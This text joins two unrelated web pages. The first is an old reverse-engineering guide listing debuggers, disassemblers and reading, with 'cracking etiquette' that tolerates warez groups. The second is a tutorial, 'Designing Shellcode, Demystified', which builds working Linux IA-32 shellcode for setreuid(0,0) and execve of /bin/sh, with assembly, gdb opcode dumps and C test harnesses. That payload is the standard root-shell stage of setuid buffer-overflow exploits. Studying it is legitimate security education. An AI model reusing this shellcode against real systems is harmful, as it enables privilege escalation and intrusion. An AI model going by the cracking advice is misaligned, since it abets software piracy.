Reverse Engineering Guide

If you are considering studying the art of software reverse engineering, then this guide is for you. I'll try to outline here everything you need to know and do. Of course, this is by no means an exhaustive list, nor a guarantee that you'll become a reversing god overnight, but it might just get you started in a whole new world. If you are at all serious, take heed and take the time to download all of my recommended materials; the time you invest in learning now will serve you well in the future. It will also be worth your while to visit some of the other sites on the web that I've linked to. After reading this document and attempting the 2 small sample programs I've made available, you'll know whether or not this really is the art for you.

What is Reverse Engineering (precisely)?

Software reverse engineering is the art and process of understanding the intricacies of your own and commercial software at a lower level than the source code, i.e. at the level of the machine code the compiler produces; a fuller definition can be found here. Many reversers initially focus on the various protection schemes that software writers use to disable or otherwise prevent full use of their software, since this is a convenient (if somewhat legally dubious) starting point with a definite challenge and end point. Personally, however, I have used the knowledge I have gained through 'reversing' to:

i) Produce my own custom tools for circumventing / identifying protections.
ii) Recover usable source code for lost projects.
iii) Identify and understand how specific functionality is implemented.
iv) Debug hard-to-find errors.
v) Analyse potentially hostile programs.

Sometimes reverse engineering can be the only way out of a development tight spot; however, it is not a decision to be taken lightly.

Reverse engineering is NOT cracking per se, although in the early stages it is sometimes difficult to draw the fine line between them. Most reversers deplore the tens of thousands of warez sites that waste good server space on the web (you probably know them already). If you are looking for easy cracks, key generators or serial number lists, then this site and reverse engineering are NOT for you. Even though that information can be obtained with fairly minimal effort, I expect most warez aficionados won't be reading this in the first place. They certainly won't have a clue how to code, assemble and link a key generator, let alone spend hours on end studying assembly routines.

By learning to reverse engineer yourself, you gain a set of valuable and marketable skills (malware analysis, intellectual property rights management and anti-virus / vulnerability research are booming industries). This distinguishes you from the many losers who would rather waste their time searching through pages of bloated graphics and commercial porn sponsors than learn anything themselves. Over time, you'll also find that your reversing efforts become less focused on protection schemes and that your interest moves away from simple protection cracking. Who knows, perhaps a job in hostile code analysis beckons...

What do I need to know / learn?

To learn reverse engineering from scratch, you will probably need to spend a significant amount of time improving your low-level knowledge. Don't think you can crack any target you fancy just by learning simple techniques ad nauseam. A familiarity with the x86 architecture and instruction set is essential. An awareness of the 6 basic digital logic gates (binary) will also be useful: AND, OR (inclusive), NOT, NAND, NOR and exclusive OR (XOR).

I recommend the following reading resources :-

Art of Assembly Language :- A 25-chapter PDF guide to virtually everything you might ever want to know about x86 processors. These documents are very complete, but reading them all will probably take you a few years or more. Read just the first few chapters and keep the rest (e.g. Chapter 14 on the FPU) for reference as your skills and needs grow.

HelpPC :- A quick and convenient 220k DOS reference program from 1991. If you've forgotten a particular assembler instruction or need to quickly look up how many clock cycles an instruction takes, then this is the guide for you (it is somewhat dated, though).

Iczelion's Win32 ASM Resources :- A great site with literally tons of useful resources; download everything there :-). If you really want to 'get into' Windows assembly language programming, there isn't much better for free than Iczelion's tutorials.

Intel Developer Manuals :- Anything you ever wanted to know about the nitty-gritty internals of your x86. I recommend Volume 3 (System Programming). I have been told recently that the previous link does not lead to all 3 manuals; you might like to try this link instead. You could also search for 386intel.txt for a good overview. Update 2004: I believe the Developer manuals now stretch to 4 guides. Either way, you shouldn't have much trouble finding them.

Mammon_'s Tales to his Grandson & Mammon_'s coming to the Iceage :- 2 definitive guides (25k) to configuring your SoftICE, with synopses of the main 3 disassemblers, by one of the very best reverse engineers out there. Mammon_, an eccentric and enigmatic character, abandoned the Windows scene a considerable number of years ago, but his website still makes for fascinating reading.

Nolan Blender's "Making Tools Work Together" :- How you can use IDA & SoftICE to maximum effect (related to FLEXlm but applicable elsewhere).

PC Assembly Tutorial :- Dr Paul Carter's free introduction to 32-bit assembly language using NASM (since it's free), previously taught as a university course. Recommended.

Ralf Brown's Interrupt List :- A maintained list of all DOS, BIOS and interrupt services; most of the time you'll be looking for subfunctions of INT 10h/13h/21h. Invaluable for older 16-bit programs or for coding your own graphics demos / key generators (or even understanding old viruses). It is somewhat dated now, so I've changed my recommendation from learning it to keeping it just for reference.

Getting and Setting up your Tools

*Updated 2007*: Compuware has officially ceased all development of SoftICE as a product. Those of us who watch the scene closely could see this coming for some time. I now leave the text below as a dedication to the past. Farewell.

Any reverser will tell you that you will only ever be as good as your tools and the competence with which you use and customise them. Your tools are your best weapons, so invest the time in learning how to use them. I suggest you obtain at least the following. You can either download them from my tools page (if the links are even working) or locate them around the web using various search techniques.

- A Windows (preferably protected-mode) Debugger - The standard tool in this category is NuMega's SoftICE, which can trace just about anything; you will not break some protections without it. Download the versions relevant to the platform you plan to investigate, or better still, download every version you can. Most of my pre-2000 guides use v3.2x/v4.0x for Windows 98. Also pay regular visits to Compuware's (formerly NuMega's) web site to keep informed of any new developments. These guys really know how to produce useful tools (need I also mention BoundsChecker & SmartCheck). It's also worth hunting down the various homepages and articles by (ex & current) NuMega developers; need I mention Matt Pietrek & John Robbins ;-).

* The advent of more recent Microsoft OSes (Windows 2000, XP) & Compuware's acquisition of NuMega mean that you must now source SoftICE as part of a Compuware package. In fact, I've heard that Compuware won't even sell SoftICE standalone to legitimate developers any longer.

DriverStudio (approx. 184 MB)

* Requires an installation serial number + FLEXlm license

DriverWorks
DriverNetworks
VtoolsD
SoftICE / Visual SoftICE
Boundschecker / TrueTime / TrueCoverage

The sale of NuMega to Compuware also seems to have contributed to a major decline in quality control. Many users have reported significant problems with SoftICE under the newer OSes, most of them relating to breakpoints not behaving as they should. There are some workarounds and custom patches, which you might find on the RCE MessageBoard (use the search facility). However, a lot of reversers have given up trying to get SoftICE to behave reliably and have resorted instead to the capable ring 3 debugger OllyDbg. OllyDbg also has the added ability to work under VMware, which seems to be all the rage right now.

SoftICE symbols

Getting debug symbols loaded into SoftICE can be a challenge, to say the least. Before attempting it, make sure that you download and install the latest 'Debugging Tools for Windows' from Microsoft. Next, replace all copies of symsrv.dll & dbghelp.dll installed by DriverStudio with those from the Debugging Tools folder. If I remember rightly, the DriverStudio root directory, the SoftICE root directory and the SymbolRetriever subdirectory all contain copies of these files that need to be replaced. Also make sure that your 'Path to NMS' is set to a directory that exists.

SoftICE under VMware

This advice comes from my good friend nc. Browse to your VM directory on the hard disk, open the VM's config file (.vmx file) in a text editor and add the following lines:

vmmouse.present = "FALSE"
svga.maxFullscreenRefreshTick = "5"

If you want to verify that SoftICE is working correctly, try the following advice that I shamelessly borrowed from Kayaker.

"If you break at the start of a program with the SoftICE loader (assuming you can) and set a breakpoint a few lines down, either on an address or on an API call, does SoftICE break? It should. Make sure you set your bp *while in the context* of the application you want to break into. This is irrespective of the ADDR command, which you shouldn't need since you're already in the correct context. In other words, don't expect to be able to just change the context with ADDR from the desktop and have a reliable bp set. If you do, you also need to specify the CS: portion of the address, or else you'll set up a bp with the wrong code segment. If all else fails, you could try BPM x breakpoints; they can be more reliable than BPX bp's for 'sticking'. However, these in particular should be set while *in* the context of the app."

This small table should provide you with a means to identify which version of SoftICE you have installed on your system.


| Version | Contents / licensing | NTICE.sys file version | NTICE.sys product version | osinfo.dat | osinfob.dat |
|---|---|---|---|---|---|
| DriverStudio v2.7 | SoftICE, DriverWorkbench, BoundsChecker, TrueTime, TrueCoverage, DriverWorks, DriverNetworks, VtoolsD (installation serial number only) | 4.0.1381 | 4.2.7 (Build 562) | 191,340 bytes | |
| DriverStudio v3.1 | As v2.7, plus Visual SoftICE (installation serial number + FLEXlm license) | 5.1.2601.0 | 4.3.1 (Build 1722) | 304,588 bytes | 200,027 bytes |
| DriverStudio v3.2 | As v3.1 | 4.3.2.2485 | 4.3.2 (Build 2485) | 350,737 bytes | 375,319 bytes |
| Latest from Compuware FTP | N/A | N/A | N/A | 474,346 bytes | 356,884 bytes (most likely out of date) |
| DriverStudio v3.2.1 Update | As v3.1 (update only, 1.65 MB) | 3.2.1 (Build 2560) | 3.2.1 (Build 2560) | 474,346 bytes | 356,884 bytes |

As SoftICE is virtually every reverser's debugger of choice, some of the more intelligent protections use various techniques to detect its presence. More likely than not, you can find a way around most of these. In certain cases, however, e.g. Hardlock's wrapper and VBox, you'll need to identify the exact trick before you can work around it. Hardlock is particularly nasty, because after you disable the CreateFileA detection you'll wind up with a frozen computer. In such circumstances an alternative debugger can be very useful. Possibilities include Borland's Turbo Debugger (included with TASM & BC++), Microsoft's WinDbg and LiuTaoTao's superb TRW; you know where to look for these :-).

OllyDbg is now highly recommended as the best alternative if your system simply won't take to SoftICE.

- A Disassembler - There are probably 2 main choices in this category: the quicker but less technical W32Dasm v8.9x from URSoftware, and the slower, more advanced Interactive Disassembler Pro (IDA) from DataRescue. The differences between these 2 are immense. Where you need a quick 'dumb deadlisting', W32Dasm may suffice, but serious analysts choose IDA for serious analysis. If you have a few spare moments, you might also care to investigate some of the older disassemblers, such as Sourcer (mostly for DOS) and WCB for Windows 3.1, although these are largely obsolete. The choice between the main 2 here is really a question of personal preference. Visual Basic v3 and v4 decompilers are also available, although I've never had a great deal of luck with the VB4 edition. For VB5 & VB6 there is now a p-code debugger courtesy of the WKT team.

If you are really interested in disassemblers, then you should check out dsassm02e, a Win32 disassembler written by a South Korean professor; visit his homepage here and download the program with full C source code. Web searchers might like to look for material written by the Australian Cristina Cifuentes, especially her thesis on decompiling to recover source code.

- A HEX Editor - There are at least a dozen choices in this category, and most reversers will develop a favourite; mine is DOS Hiew. Software archives (e.g. Simtel) will turn up at least 30 HEX editors, some better than others. Of the many out there in the woods, the following seem to be popular with reversers: Hex Workshop, UltraEdit and HEdit (note: HEdit now appears to be unsupported). You should, of course, learn how to reverse your tools first.

- Our Tools - Progress is constantly being made in this area (although sporadically), so this section is probably out of date within weeks of my writing it. In retrospect, arguably the 2 best developments have been IceDump by The Owl et al & ProcDump courtesy of G-RoM & Stone (now integrated into IceDump). Many other tools have also appeared. For example, r!sc has done some very good work in the unpacking and CD protection fields, others have contributed unpackers for specific packers (check out the Unpacking Gods webpage if you can) & Tsehp has contributed Revirgin.

The games scene has also pushed forward the boundaries of our tools. An entire scene is now built around in-memory patching (or 'training'), courtesy of Stone and others delving inside the Win32 debug API. In late 1999 Stone's Webnote (a very interesting collection of his own exploits) disappeared from the web. For personal reasons he is reluctant ever to re-upload it, a decision you might not agree with but should respect. A final archive of some of the very interesting material on his site can be found here (1.08 MB, 1,141,940 bytes).

- Support Tools - Room must also be found in any reverser's toolbox for the following tools :-

i) File Monitoring (FileMon) & Registry Monitoring (RegMon) from the wizards at SysInternals.
ii) InstallShield script decompiling (isDCC, Wisdec).
iii) Installation Monitoring (CleanSweep from Quarterdeck).
iv) Resource Editor (BRW 4.5, eXeScope, Symantec Resource Studio, Resource Hacker, Restorator).

Cracking Etiquette

Indeed, there is such a thing. When starting out, you should probably stick closely to these pieces of advice, or else you might make some very nasty enemies (this applies mainly to IRC and message boards).

i) DON'T post long lists of tool requests, specifically for SoftICE and IDA, the first time you join one of these forums. At best you'll be politely told to "learn how to search", and at worst you'll be flamed out of existence; not a great way to make friends in this world. There are ways and means of obtaining said tools, but public forums are not the place. I know that many reversers will privately help you obtain what you need, yet you'll need to develop some skill at telling apart those who might help from those who never will.

ii) When you've actually cracked a few programs, it is very easy to become aloof and maybe somewhat egotistical; I know this to my cost because I've been there and done it too. As a general rule, it's best never to boast or be cocky. Trust me, someone out there knows more than you & will eventually shoot you down in flames, no matter how clever you think you are ;-). You aren't compelled to reply to 'lamer requests', so maintaining a respectful silence is often 10x more effective. No-one on a message board appreciates a reply to a request for help along the lines of "man, you must be stupid, I cracked that in 5 minutes"; real help rather than ridicule is the order of the day.

iii) Joining warez groups is a matter for your own conscience. I would guess that 50% of the community deplores such groups and 50% tolerates them. I'm one of the tolerant group, because you may be able to obtain some very interesting specific targets from these sources; naturally, I wouldn't dream of cracking these targets or making them available for the losers to download for free. If you are offered hardware incentives to crack for any group, you should turn them down immediately (unless, of course, you have a very secure place to have them sent).

iv) If you should encounter me on IRC not following my own rules, be sure to tell me I'm a hypocrite ;-). The reversing community is much like any other: "do unto others as you would have them do unto you". Apply basic common sense and you won't go far wrong.

Designing Shellcode, Demystified
In our previous paper, Buffer Overflows Demystified, we told you that there
would be more papers on these subjects. We have kept our promise: here is the
second paper in the same series. It covers the fundamentals of shellcode
design and is entirely specific to Linux 2.2 on IA-32. The basic principles
apply to all architectures, although the details obviously might not.

ftp://download.intel.com/design/Pentium4/manuals/24547008.pdf

http://www.enderunix.org/documents/en/sc-en.txt


WHAT'S SHELLCODE?
In our previous paper, we said several times that once we gain control
over the execution of the target program, we can run any code we want. Let's
recall:

"strcpy() copied large_one to foo, without bounds checking, filling
the whole stack with A, starting from the beginning of foo1, EBP-16.

Now that we could overwrite the return address, if we put the address
of some other memory segment, can we execute the instructions there?
The answer is yes.

Assume that we place some /bin/sh spawning instructions on some memory
address, and we put that address on the function's return address that
we overflow, we can spawn a shell, and most probably, we will spawn a
rootshell, since you'll be already interested with setuid
binaries." [5]

Recall, again, that the instructions the CPU runs are placed somewhere in
memory. All we do is place our code somewhere in memory and make EIP point
to it.

We name these assembly instructions "the shellcode". To use it within an
exploit, we put their hexadecimal opcodes in a character array.

Several methods are available to get those instructions:
1. Write directly in hexcode
2. Write the assembly instructions, then extract the opcodes
3. Write in C, extract assembly instructions and then opcodes

We'll first use the third method to run some simple system calls, such as
exit. Soon after that, we'll write a shellcode that spawns a new shell.

The code we'd like to run will usually execute a system program, e.g. spawn
a root shell or, if it runs remotely, bind a root shell to a newly created
socket. When we talk about "executing a program", we mean "calling a kernel
service that is responsible for creating and executing a new system process".
These services run in the most privileged CPU mode, namely kernel mode, so we
need an entry point into the kernel to use them. They are made available to
userspace programs via system calls. Thus, to understand what shellcode is
all about, we first need to dive into system calls.

SYSTEM CALLS

Entries into the kernel can be categorized according to the event or action
that initiates them:

1. Hardware Interrupt
2. Hardware trap
3. Software initiated trap

Hardware interrupts arise from external events, such as an I/O device needing
attention or a clock reporting passage of time. Hardware interrupts occur
asynchronously and may not relate to the context of the currently executing
process.

Hardware traps may be either synchronous or asynchronous, but they are related
to the currently executing process. Examples of hardware traps are those
generated as a result of an illegal arithmetic operation, such as divide by
zero.

Software initiated traps are used by the system to force an event, such as
process rescheduling or network processing, to be scheduled as soon as
possible. System calls are a special case of a software initiated trap: the
machine instruction used to initiate a system call typically causes a
hardware trap that the kernel handles specially. After clock processing, a
request to make a system call is the most frequent trap into the kernel. The
system call handler must do the following work:

1. Verify that the parameters to the system call are located at a valid user
address and copy them from the user's address space into the kernel

2. Call a kernel routine that implements the system call [2]

There are two mechanisms under Linux for implementing system calls:
1. lcall7/lcall27 gates
2. INT 0x80 software interrupt

Native Linux programs use int 0x80, whilst binaries from foreign flavors of
UNIX (Solaris, UnixWare 7 etc.) use the lcall7 mechanism. The name "lcall7" is
historically misleading because it also covers lcall27 (e.g. Solaris/x86), but
the handler function is called lcall7_func.

When the system boots, the function arch/i386/kernel/traps.c:trap_init() is
called which sets up the IDT (Interrupt Descriptor Table) so that vector 0x80
(of type 15, dpl 3) points to the address of system_call entry from
arch/i386/kernel/entry.S.

When a userspace application makes a system call, the arguments are passed via
registers and the application executes the 'int 0x80' instruction. This causes
a trap into kernel mode, and the processor jumps to the system_call entry point
in entry.S. This entry point generally does the following:

1. Save registers
2. Conduct some sanity checking
3. Call the particular system_call handler function to handle the system call.
[3]

The EAX register holds the number of the requested system call. The meaning
of the other registers depends on which system call EAX selects.

To give an example, let us assume that a process requests _exit. Before going
into kernel mode, the underlying library function sets EAX to 0x1, which
denotes sys_exit, sets EBX to the parameter given to exit() and executes
int 0x80. When the trap occurs, the kernel locates the appropriate handler
routine. In this scenario, since EAX is 0x1, kernel/exit.c:sys_exit is
executed. This function acts according to the value in the EBX register.

Now that we've gone through the mechanisms involved in system calls and how
they actually work, we can start invoking them from our assembly instructions.
Once we get the instructions, we'll find the hexadecimal opcode for them,
put them in an array and create our shellcode.

EXIT SHELLCODE

Let's first code in C, and see for ourselves:


$ export CFLAGS=-g

{codecitation style="brush: cpp;"}

----------------------- c-exit.c ------------------------------
#include <stdlib.h>

int main(void)
{
exit(0);
}
----------------------- c-exit.c ------------------------------

{/codecitation}


$ make c-exit
cc -g c-exit.c -o c-exit
$ gdb ./c-exit
(gdb) b main
Breakpoint 1 at 0x80483b7: file c-exit.c, line 5.
(gdb) r
Starting program: /home/balaban/sc/./c-exit
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.

Breakpoint 1, main () at c-exit.c:5
5 exit(128);
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400a5ee0 <_exit>: mov %ebx,%edx
0x400a5ee2 <_exit+2>: mov 0x4(%esp,1),%ebx
0x400a5ee6 <_exit+6>: mov $0x1,%eax
0x400a5eeb <_exit+11>: int $0x80
--- snipped ---

End of assembler dump.
(gdb)

As you can see above, the standard library function _exit sets EAX to 0x1
and EBX to the parameter pushed onto the stack (the argument to the function,
which is the actual exit status).

So, here are the instructions for exit(0):
xorl %ebx, %ebx   /* return code for exit(): set EBX to zero */
movl $0x1, %eax   /* sys_exit */
int $0x80         /* generate the trap */

http://world.std.com/~slanning/asm/syscall_list.html

sys_exit is defined as follows:

%eax  Name      Source         %ebx  %ecx  %edx  %esi  %edi
1     sys_exit  kernel/exit.c  int   -     -     -     -

We can write the instructions inline in a C function:

{codecitation style="brush: cpp;"}

----------------------- a-exit.c ------------------------------
int main(void)
{
__asm__("xorl %ebx, %ebx\n\t"   /* EBX = 0: exit status */
        "movl $0x1, %eax\n\t"   /* EAX = 1: sys_exit */
        "int $0x80");           /* trap into the kernel */
}
----------------------- a-exit.c ------------------------------

{/codecitation}

We can use strace to trace the system calls a program makes while it
executes:

$ strace ./a-exit
execve("./a-exit", ["./a-exit"], [/* 32 vars */]) = 0
brk(0) = 0x80494d8

--- snipped ---

_exit(0) = ?
$


As you can see, exit(0) has been executed!

We can move on to another system call:
setreuid(0, 0)

Sometimes we need "privilege restoration routines", which give a process back
root privileges that it still holds but has temporarily set aside for security
reasons. These routines are especially useful for exploiting vulnerabilities
in setuid binaries that temporarily lower, but do not completely drop, their
elevated privileges. setreuid is one of them; it sets the process's real and
effective user IDs. [4]

From the URL given above, you can get some information about this system
call:


%eax  Name          Source        %ebx   %ecx   %edx  %esi  %edi
70    sys_setreuid  kernel/sys.c  uid_t  uid_t  -     -     -

The same principles apply here. We set EAX to 0x46 (70 decimal), which is
sys_setreuid's number, EBX to the real user ID and ECX to the effective user ID.

{codecitation style="brush: cpp;"}

----------------------- a-setreuid.c ------------------------------

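int main(void)
{
__asm__("xorl %ebx, %ebx\n\t"   /* EBX = 0: real user ID */
        "xorl %ecx, %ecx\n\t"   /* ECX = 0: effective user ID */
        "movl $0x46, %eax\n\t"  /* EAX = 70: sys_setreuid */
        "int $0x80\n\t"         /* trap into the kernel */
        "xorl %ebx, %ebx\n\t"   /* then exit(0), as before */
        "movl $0x1, %eax\n\t"
        "int $0x80");
}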

----------------------- a-setreuid.c ------------------------------

{/codecitation}

xorl %ebx, %ebx
Set the EBX register to 0: XORing any number with itself gives zero.
Remember that EBX holds the real user ID.

xorl %ecx, %ecx
ECX = effective user ID = 0

mov $0x46, %eax
EAX = 0x46 (sys_setreuid).

int $0x80
Dive into kernel mode.

The instructions after this are the ones for exit(0).

$ make a-setreuid
cc a-setreuid.c -o a-setreuid
$ su
# strace ./a-setreuid
execve("./a-setreuid", ["./a-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494e4

---- snipped ----

setreuid(0, 0) = 0
_exit(0) = ?
#

http://www.gnu.org/manual/gdb-4.17/html_chapter/gdb_9.html#SEC56

$ gdb ./a-setreuid
(gdb) disas main
Dump of assembler code for function main:
0x8048380 <main>: push %ebp
0x8048381 <main+1>: mov %esp,%ebp
0x8048383 <main+3>: xor %ebx,%ebx
0x8048385 <main+5>: xor %ecx,%ecx
0x8048387 <main+7>: mov $0x46,%eax
0x804838c <main+12>: int $0x80
0x804838e <main+14>: xor %ebx,%ebx
0x8048390 <main+16>: mov $0x1,%eax
0x8048395 <main+21>: int $0x80
0x8048397 <main+23>: leave
0x8048398 <main+24>: ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>: 0x31
(gdb) x/bx main+4
0x8048384 <main+4>: 0xdb
(gdb) x/bx main+5
0x8048385 <main+5>: 0x31
(gdb) x/bx main+6
0x8048386 <main+6>: 0xc9
(gdb) x/bx main+7
0x8048387 <main+7>: 0xb8
(gdb) x/bx main+8
0x8048388 <main+8>: 0x46
(gdb) x/bx main+9
0x8048389 <main+9>: 0x00
(gdb) x/bx main+10
0x804838a <main+10>: 0x00
(gdb) x/bx main+11
0x804838b <main+11>: 0x00
(gdb) x/bx main+12
0x804838c <main+12>: 0xcd
(gdb) x/bx main+13
0x804838d <main+13>: 0x80
(gdb) x/bx main+14
0x804838e <main+14>: 0x31
(gdb) x/bx main+15
0x804838f <main+15>: 0xdb
(gdb) x/bx main+16
0x8048390 <main+16>: 0xb8
(gdb) x/bx main+17
0x8048391 <main+17>: 0x01
(gdb) x/bx main+18
0x8048392 <main+18>: 0x00
(gdb) x/bx main+19
0x8048393 <main+19>: 0x00
(gdb) x/bx main+20
0x8048394 <main+20>: 0x00
(gdb) x/bx main+21
0x8048395 <main+21>: 0xcd
(gdb) x/bx main+22
0x8048396 <main+22>: 0x80
(gdb)

Our shellcode:


{codecitation style="brush: cpp;"}

----------------------- s-setreuid.c ------------------------------
char sc[] = "\x31\xdb" /* xor %ebx, %ebx */
"\x31\xc9" /* xor %ecx, %ecx */
"\xb8\x46\x00\x00\x00" /* mov $0x46, %eax */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xor %ebx, %ebx */
"\xb8\x01\x00\x00\x00" /* mov $0x1, %eax */
"\xcd\x80"; /* int $0x80 */

int main(void)
{
void (*fp) (void);

fp = (void *)sc;
fp();
}
----------------------- s-setreuid.c ------------------------------

{/codecitation}

$ su
# make s-setreuid
cc s-setreuid.c -o s-setreuid
# strace ./s-setreuid
execve("./s-setreuid", ["./s-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494f8

---- snipped ----

setreuid(0, 0) = 0
_exit(0) = ?
#



As you can see, the shellcode has the same effect.

SHELL SPAWNING SHELLCODE

This is the sweetest part. Based on what we've learnt so far, let's try
coding a shellcode that spawns an interactive shell. The first thing we should
do is analyze the execve system call in a little more detail. Go to the URL
given above and get some idea:

%eax  Name        Source                      %ebx            %ecx  %edx  %esi  %edi
11    sys_execve  arch/i386/kernel/process.c  struct pt_regs  -     -     -     -

The table only tells us that the handler takes a struct pt_regs, which is not
very explanatory. The handler is in arch/i386/kernel/process.c. Let's see it:

/*
* sys_execve() executes a new program.
*/
asmlinkage int sys_execve(struct pt_regs regs)
{
int error;
char * filename;

filename = getname((char *) regs.ebx);
error = PTR_ERR(filename);
if (IS_ERR(filename))
goto out;
error = do_execve(filename, (char **) regs.ecx, (char **) regs.edx, &regs);
if (error == 0)
current->ptrace &= ~PT_DTRACE;
putname(filename);
out:
return error;
}

As you can see, EBX holds the address of the command, which in this scenario
is the address of the string "/bin/sh". This gives us no further clue as to
what ECX and EDX do. However, the routine calls another function, do_execve,
and passes these values to it. To understand what they really are, we need to
go further:

From fs/exec.c:

int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs)

Here, it's clear that ECX holds the address of argv[] and EDX holds the
address of envp[]. Both are arrays of pointers to character strings. The
environment may be NULL, which means we can put a zero in EDX. However, we
need to supply at least argv[0], the name of the program. Since argv[] must
be NULL terminated, argv[1] will be zero.

So we'll need to:
* have the string "/bin/sh" somewhere in memory
* write the address of that into EBX
* create a char ** array holding the address of that "/bin/sh"
followed by a NULL pointer.
* write the address of that char ** into ECX.
* write zero into EDX.
* issue int 0x80 and generate the trap.

Let's start typing:

First, write a NULL terminated "/bin/sh" into memory. We can do this by
pushing a zero word followed by the string onto the stack:

Create a zero in EAX. It will be used to terminate the string:


xorl %eax, %eax

Push that zero (NULL) onto the stack:
pushl %eax

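Push "//sh". The extra slash pads "/sh" to exactly four bytes (the kernel
treats "//" in a path as "/"). The bytes appear reversed in the immediate
because IA-32 is little-endian:
pushl $0x68732f2f

Push "/bin". The stack grows downwards, so this word lands just below "//sh":
pushl $0x6e69622f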

At this moment, ESP points to the start of the string "/bin//sh". We can
safely write this address into EBX:
movl %esp, %ebx

EAX is still zero. We can use this to terminate char **argv:
pushl %eax

If we now push the address of "/bin//sh" onto the stack as well, ESP will
point to an array holding that address followed by the NULL we just pushed.
In this way, we have created char **argv in memory:
pushl %ebx

And write the address of argv into ECX:
movl %esp, %ecx

EDX may happily be zero.
xorl %edx, %edx

sys_execve is 0xb, and that must be in EAX. Since EAX is still zero, loading
0xb into its low byte AL is enough:
movb $0xb, %al

Trigger the interrupt and enter kernel mode:
int $0x80

{codecitation style="brush: cpp;"}

----------------------- sc.c ------------------------------

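int main(void)
{
__asm__("xorl %eax, %eax\n\t"        /* EAX = 0 */
        "pushl %eax\n\t"             /* string terminator */
        "pushl $0x68732f2f\n\t"      /* "//sh" */
        "pushl $0x6e69622f\n\t"      /* "/bin" */
        "movl %esp, %ebx\n\t"        /* EBX = address of "/bin//sh" */
        "pushl %eax\n\t"             /* argv[1] = NULL */
        "pushl %ebx\n\t"             /* argv[0] = "/bin//sh" */
        "movl %esp, %ecx\n\t"        /* ECX = argv */
        "xorl %edx, %edx\n\t"        /* EDX = envp = NULL */
        "movb $0xb, %al\n\t"         /* EAX = 11: sys_execve */
        "int $0x80");                /* trap into the kernel */
}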

----------------------- sc.c ------------------------------

{/codecitation}

$ make sc
cc -g sc.c -o sc
$ ./sc
sh-2.04$

It works. Let's find the opcodes byte by byte and construct our shellcode:

$ gdb ./sc
(gdb) disas main
Dump of assembler code for function main:
0x8048380 <main>: push %ebp
0x8048381 <main+1>: mov %esp,%ebp
0x8048383 <main+3>: xor %eax,%eax
0x8048385 <main+5>: push %eax
0x8048386 <main+6>: push $0x68732f2f
0x804838b <main+11>: push $0x6e69622f
0x8048390 <main+16>: mov %esp,%ebx
0x8048392 <main+18>: push %eax
0x8048393 <main+19>: push %ebx
0x8048394 <main+20>: mov %esp,%ecx
0x8048396 <main+22>: xor %edx,%edx
0x8048398 <main+24>: mov $0xb,%al
0x804839a <main+26>: int $0x80
0x804839c <main+28>: leave
0x804839d <main+29>: ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>: 0x31
(gdb) x/bx main+4
0x8048384 <main+4>: 0xc0
(gdb)
0x8048385 <main+5>: 0x50
(gdb)
0x8048386 <main+6>: 0x68
(gdb)
0x8048387 <main+7>: 0x2f
(gdb)
0x8048388 <main+8>: 0x2f
(gdb)
0x8048389 <main+9>: 0x73
(gdb)
0x804838a <main+10>: 0x68
(gdb)
0x804838b <main+11>: 0x68
(gdb)
0x804838c <main+12>: 0x2f
(gdb)
0x804838d <main+13>: 0x62
(gdb)
0x804838e <main+14>: 0x69
(gdb)
0x804838f <main+15>: 0x6e
(gdb)
0x8048390 <main+16>: 0x89
(gdb)
0x8048391 <main+17>: 0xe3
(gdb)
0x8048392 <main+18>: 0x50
(gdb)
0x8048393 <main+19>: 0x53
(gdb)
0x8048394 <main+20>: 0x89
(gdb)
0x8048395 <main+21>: 0xe1
(gdb)
0x8048396 <main+22>: 0x31
(gdb)
0x8048397 <main+23>: 0xd2
(gdb)
0x8048398 <main+24>: 0xb0
(gdb)
0x8048399 <main+25>: 0x0b
(gdb)
0x804839a <main+26>: 0xcd
(gdb)
0x804839b <main+27>: 0x80
(gdb)

{codecitation style="brush: cpp;"}

----------------------- s-sc.c ------------------------------

char sc[] =
"\x31\xc0" /* xor %eax, %eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

int main(void)
{
void (*fp) (void);

fp = (void *)sc; /* treat the opcode bytes as a function */
fp();
}

----------------------- s-sc.c ------------------------------

{/codecitation}

$ make s-sc
cc -g s-sc.c -o s-sc
$ ./s-sc
sh-2.04$


LAST WORDS
Using the logic described above, one can construct all kinds of fantastic
shellcode. All it takes is a little attention.